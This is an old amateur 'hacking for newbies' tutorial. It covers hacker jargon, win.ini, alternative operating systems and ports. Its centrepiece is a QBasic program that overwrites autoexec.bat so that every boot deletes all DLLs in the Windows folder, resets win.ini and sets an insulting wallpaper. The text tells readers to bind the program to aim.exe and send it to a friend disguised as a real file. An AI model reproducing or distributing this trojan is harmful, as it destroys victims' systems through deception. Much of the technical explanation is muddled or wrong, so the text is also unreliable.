Hacking Windows for The Complete Newbie Part 2 By: SLIPStream (formerly known as Morbos or Dynamite) Contact information located at the end of the file. (Please note: Newbie is not meant to be used as a put down. All great hackers were once newbies so please dont get POed about the terminology!) :) WARNING: This file contains some elements which are considered illigal in most countries including the united states. The author assumes no responsiblity for the actions of the reader after reading this file. The reader hereby understands that the file is for educational purposes ONLY. The author does not encourage illigal activity and cannot be held responsible for the readers actions. If you agree to this, procede in reading the file, otherwise, please exit now. Ok. If you read the Part 1 to this text file you should have no problem understanding this one. This file contains alot of code, so you need some compilers. First of all download these. They're good tools for you to have as a hacker: QBasic 4.5 Dev-C++ (or use another C++ compiler) Cain and Abel Password cracker L0phtCrack AIM (AOL Instant Messenger) Java2 SDK NASM for windows FileBinder Once you have all this stuff you can get started. This file assumes that you have read the previous Part (part 1). Section 1: H4X0R 3L337 73RM1N0L0GY (Hacker Eleet Terminology) On the internet your gonna meet alot of hackers who claim to be "3L33T" (Eleet). I probably wouldnt take their word for it. Most of them are probably Script Kiddies (explained later). But who knows, maybe some of them are really 3L33T ;) Anyways, here is some hacker terminology that you should become farmiliar with: Firewall: A piece of software designed to "Harden the Target". "Hardening the Target": Old hacker saying: No computer is unbreakable. But the computer can be 'hardened' from attackers. This term is popular with security experts. Router: A hardware device which stands as an intermediate between the computer and the internet. Multiple computers can be attached to the same router. Normaly used for networking however, one computer can use its own router. Programming: If you dont know this one by now then you probably should take a step back and read about it. A program is a set of instructions which tells the computer what to do. TCP/IP: Transmition Control Protocol/Internet protocol. Basicly, this is the internet. Theres more about this then i could possibly explain to you in one text file. Grid: A computer network arranged in the form of a grid. Normaly used by large corperations. Node: Any single computer attached to a large network. OS: Operating System. Explained later. Thats not the half of it. But its enough to get you through this tutorial. Section 2: Im lost Im sure you probably are. Dont take to big a bite out of the computer world or you'll get completely lost. In the world of computers, things can get really hard, really fast. Assuming that you read the last part, lets get started. CODING!!!! As a hacker, your going to be doing alot of coding. Hacking isn't instant. It requires work and effort. Your first languages should be C, C++, Python, and if your witty, QBasic. What??? QBasic??? You Newb! No. No matter what people say, QBasic still remains one of the most clasic programing languages (Not to mention the easiest and effective). The only thing that is missing from the QBasic language is the ability to use the TCP/IP protocol from the programming console (apart from dos access to the net commands) Pretend you already know some programming (You should read some files on it). You need to know how to exploit! Exploiting is the act of finding a flaw on a computer system (or in a program or operating system), and using this flaw to break in to the selected system. These exploits are usualy created through the process of exploitation, shown below: Program or Operating ---------> Decompile code System or \ \ _\/ \ \ See Visible \ flaws ------------> Write Code or Perform action to exploit flaw Incase that wasnt clear for you, heres an example: A computer hacker is looking at a list of his open ports to see how he can harden his computer when he notices that the NetBIOS port is left open. He does some research and discovers that this port is used for file and printer sharing. He askes around on some hacker BBS's, and finds out that not many windows users know about this flaw, and do not password agains it. So, he finds out how to connect to this port, and writes a simple batch file that exploits this flaw. Get it? With this knowledge, you too can write exploit code. Lets start off with some pre-made exploits: Windows.ini Flaws - Windows.ini (or on XP, win.ini) is a ticking time bomb waiting to explode. It contains code which controls the way windows runs programs, shares files and folders, even what programs run under certain file extentions. Here is a piece of a win.ini file: ; for 16-bit app support part1 [fonts] part2 [extensions] part3 [mci extensions] part4 [files] part5 [Mail] MAPI=1 CMC=1 CMCDLLNAME=mapi.dll CMCDLLNAME32=mapi32.dll MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1 part6 [MCI Extensions.BAK] aif=MPEGVideo aifc=MPEGVideo aiff=MPEGVideo asf=MPEGVideo2 asx=MPEGVideo2 au=MPEGVideo m1v=MPEGVideo m3u=MPEGVideo2 mp2=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo2 mpa=MPEGVideo mpe=MPEGVideo mpeg=MPEGVideo mpg=MPEGVideo mpv2=MPEGVideo snd=MPEGVideo wax=MPEGVideo2 wm=MPEGVideo2 wma=MPEGVideo2 wmv=MPEGVideo2 wmx=MPEGVideo2 wvx=MPEGVideo2 part7 [WAOL] AppPath=E:\Program Files\America Online 9.0 SharedPath=E:\Program Files\Common Files\AOLSHARE Ok, lets break it down. Part 1, fonts. Absolutely nothing interesting here. Even if you could, it would be boring to exploit a users fonts. [extensions] - normaly, there would be something here, but aparently this computer is storing its extension library somewhere else. [mail] - this computer seems to support the MAPI protocol. Whats MAPI? No, its not the old arcade game. MAPI is a mail protocol, its kind of old, but still useful. Now, most mail is POP3 or SMTP. [MCI Extensions.BAK] - Not much to exploit here. But you could mess with the users file extentions. You could inject the code: exe=MPEGVideo To the end of this section and it would force the computer to run its default MPEG video player (such as windows media player) with it instead of executing the file. [WAOL] - Aparently this user uses aol. Hehe. AOL is very easy to exploit, as explained in the last part. Well, not much can be exploited from here. BUT WAIT!!! There was a DLL file listed in part 5! Lets run a search. Searching for MAPI.DLL... There were 5 files found. Did you find what you wanted? Lets take a look: sfmapi.dll MAPI.DLL HMMAPI.DLL HIPMAPI.DLL aimapi.dll Lets look into the MAPI.DLL file... WHOAH!!! Tons of encrypted, boring code. Nothing to exploit here. Whats that last thing I see on the list? aimapi.dll? Wait... Thats not artificial inteligence mapi... Its the AIM API!!!! Whats that? An API is an application programing interface. An application programming interface is a big library used to code. Its so that they wont have to rewrite the code over and over again. Lets look inside... Nothing... Hmmm, wait! Theres unencrypted code here!!! There is some code here. Take a look for yourself, its located in C:\Program Files\AIM The file's named aimapi.dll. Open it up and look at the code. Hmm. This is interesting. Theres code, lets look. %BASE%\aim.exe This is about the only real help in the file. Hmm... What does this mean? %BASE% must mean the default directory for AIM. Aim.exe, well, thats self explanitory. This really isnt very much help. But, we can exploit this. Ok, first of all, lets write some code. This one is going to be a bootup virus. What is a bootup virus? A bootup virus is simply a virus that executes during startup! Doi! ;) Ok, here we go. Open up your qbasic compiler and lets get started! First of all we need to know how to make a boot virus. A real boot virus is one normaly written in ASM, which writes itself to the bootsector of a computer, so that it will damage the hard disk or other drives during the boot process, virtualy undetectable. This boot virus will be a simple batch file binded to an exe file. This program will be small enough to fit through a 56k dialup line, but big enough to not arouse suspision. The virus overwrites autoexec.bat (the file executed on startup), then writes its own code to it. This code is malicious, so it will greatly damage the victems hard disk, but it will not completely destroy it. The effects are still reversable, but it will cause the target much frustration. Ok, lets start by taking a look at autoexec.bat. WARNING! This exploit will not work on windows XP. Windows XP runs on the NTFS filesystem, not a FAT filesystem. This means that DOS must be emulated. XP runs its own startup sequence, however it is not a bat file. It should be located at C:\AUTOEXEC.BAT Open it with notepad or the windows edit command. Now you can look at it and see what is executing on your computer startup. Ok, heres some QBasic code: '******Start Copying Here******* dim line1 as string dim line2 as string dim line3 as string dim line4 as string dim line5 as string dim win1 as string dim win2 as string dim win3 as string dim win4 as string dim win5 as string dim win6 as string dim win7 as string dim win8 as string dim background as string dim background1 as string win1 = "[fonts]" win2 = "[extensions]" win3 = "[mci extensions]" win4 = "[files]" win5 = "[MCI Extensions.BAK]" win6 = "[WAOL]" win7 = "AppPath=C:\AUTOEXEC.BAT" win8 = "SharedPath=E:\Program Files\Common Files\AOLSHARE" 'Important stuff background = "[Desktop]" background1 = "Wallpaper=C:\WINDOWS\SYS32x1.html" html1 = " html4 = "
YOU SUCK!" html2 = "You suck You suckYou suck You suck" html3 = " html5 = "
html6 = " line = "@echo off" line1 = "@cd\" line2 = "@cd\windows" line3 = "@copy sys20344.ini windows.ini" line4 = "@cd\" line5 = "@del c:\windows\*.dll" shell "cd\" open "autoexec.bat" for output as #1 open "c:\windows\sys20344.ini" for output as #2 print #1, line print #1, line1 print #1, line2 print #1, line3 print #1, line4 print #1, line5 close #1 print #2, win1 print #2, win2 print #2, win3 print #2, win4 print #2, win5 print #2, win6 print #2, win7 print #2, win8 print #2, background print #2, background1 close #2 open "C:\WINDOWS\SYS32x1.html" for output as #3 print #3, html1 print #3, html4 print #3, html2 print #3, html3 print #3, html5 print #3, html6 close #3 '******* Stop Copying Here ******* Wooh... that took longer than it should have. Bind this to AIM.exe and send it to your friend over aim. He/She will probably think that it is default because he see's the filename aim.exe on the download area. Once he downloads it it will force the following effects: - Background will change to black with the text scrolling across the screen "You suck" - All .dll files will be destroyed (causing most programs to siece to function - Win.ini will be reset, causing loss in settings (big time dump) and the best part about it is: - Even when they fix all this, it will happen again on reboot!!! ;) This concludes section 2. Section 3: Emerging from the windows environment Believe it or not, there is more out there than windows. Most non-tech savvy users awe and disbelieve that there is any other operating system than windows. But there is, and you should get one. Dont get me wrong, i dont HATE windows. I just dislike it. Me, im a genuine dos user. You should learn to use dos too. 'Cause if your a fast typer, you can get more done in dos in an hour than you could in windows in a week. But apart from these big corperate operating systems, there are more. Some of these include: - Linux <- Popular - BSD <- L337 - Floppy OS's <- I love em'! - Mac <- Bleah... There are thousands more. Some even run by individuals! You need to first select your operating system. To get started, take a look at SuSE Linux and RedHat Linux. These are popular distrobutions and can be purchased for a small price, or downloaded for free from their websites. But if your not ready to make the full jump to Linux and abandon windows yet, take a look at some floppy distrobutions. The best out there is MuLinux. MuLinux is a full, linux operating system that fits on a single floppy disk. There is not risk since it runs completely from RAM. However, it can be 'Cloned' to your hard disk, without changing your operating system. When you 'clone' mulinux, it creates a directory called "c:\linux" and stores all of its files there. You can then boot into dos and then load the linux kernel without a floppy. But, if you dont like command line, you can still download X11 (the X windows file explorer) and run it with MuLinux. X Windows will run MuLinux as if it were a normal desktop operating system. Just think about it. Section 4: TCP/IP, Getting much more technical Ok, as discussed earlier, TCP/IP is Transmition Control Protocol/Internet Protocol. What is all this??? Basicly, it is the internet. They are the protocols which make the internet what it is today. They control all connections on the internet, and run services which allow remote computers to connect. There are 65,500 possible ports which could be open on a computer, lets look at this more closely. What is a port? A port is like a window or door on a house. It is an entrance, a gateway. Example: When you go to a website, that website is nothing but a computer, or a network of computers, with port 80 or 81 purposely left open. Its like a store, opening up their front window so you can see whats for sale. Thats about as well as i can explain it to you. Everything you do on the internet is through the use of these ports, be it downloading a file, playing a game, or paying your bills. The most commonly used ports are: HTTP - Websites FTP - Downloads Telnet - Remote connection Heres what a computer on the internet might look like (using the house analogy): Driveway __________ ==========| | ==========| Garage | | | ---------- ___| |________ | | | | -- Front = Back -- Door = Door | | |________________| Ok. How does this help me in understanding ports? You see the front door? That represents port 23, or Telnet. It is how you would normaly access your computer remotely. The driveway represents your router. Its how you are connected to the rest of the internet. The garage represents the HTTP port, as if you were having a garage sale. Now the back door usualy stays locked. But due to a recent breakin, it is left open. Here's your chance to strike. Whats a backdoor? A backdoor is a program left by a cracker to make sure that he/she has access to the system even after the passwords are changed. Heres something new for you to try: Click start->run-> and type 'telnet sdf.lonestar.org' without the quotes or " ditto 'and type 'telnet cyberspace.org ' without the quotes These shell accounts will help you get started with Unix. Thats all for now. Sorry i cant explain the whole tcp/ip protocol and cisco networking standards to you now. Maybe ill publish a guide on tcp/ip later on. The next tutorial should be coming out soon! Have phun! And dont get caught! Contact information: E-Mail: blackfire@dangerous-minds.com <- please use this one blackfire@phayze.com morbos@white-star.com For Other information: slipstream_node@yahoo.com Website: dataflux.cjb.net My Email Service: Please request an account. I dont want to overload my disk quota. Please contact me to request an account. Unauthorized accounts will be deleted. http://wwww.mysticism.zzn.net (username@mysticism.zzn.net) Yahoo IM: SLIPStream_node